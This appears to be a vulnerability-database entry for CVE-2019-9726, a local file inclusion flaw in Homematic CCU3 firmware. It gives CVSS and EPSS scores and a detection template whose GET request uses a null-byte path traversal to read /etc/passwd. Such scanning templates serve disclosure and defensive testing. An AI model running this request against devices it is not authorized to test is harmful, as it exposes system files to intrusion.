5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.036 Low
EPSS
Percentile
91.7%
eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device’s filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
id: CVE-2019-9726
info:
name: Homematic CCU3 - Local File Inclusion
author: 0x_Akoko
severity: high
description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the system.
remediation: |
Apply the latest security patches or updates provided by the vendor.
reference:
- https://atomic111.github.io/article/homematic-ccu3-fileread
- https://nvd.nist.gov/vuln/detail/CVE-2019-9726
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9726
cwe-id: CWE-22
epss-score: 0.03616
epss-percentile: 0.91664
cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: eq-3
product: ccu3_firmware
tags: cve2019,cve,homematic,lfi,eq-3
http:
- method: GET
path:
- "{{BaseURL}}/.%00./.%00./etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "bin:.*:0:0:"
condition: or
- type: status
status:
- 200
# digest: 4b0a00483046022100db821fa50dfc0ad43f0f6309e81ca1fc7b68bf91be5df336a4bd5cb43f5d016a022100a54f11f1fba2ba7d81d5d470ccbd8b268bf262312d096d9923b4a8f6b0dca73c:922c64590222798bb761d5b6d8e72950
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.036 Low
EPSS
Percentile
91.7%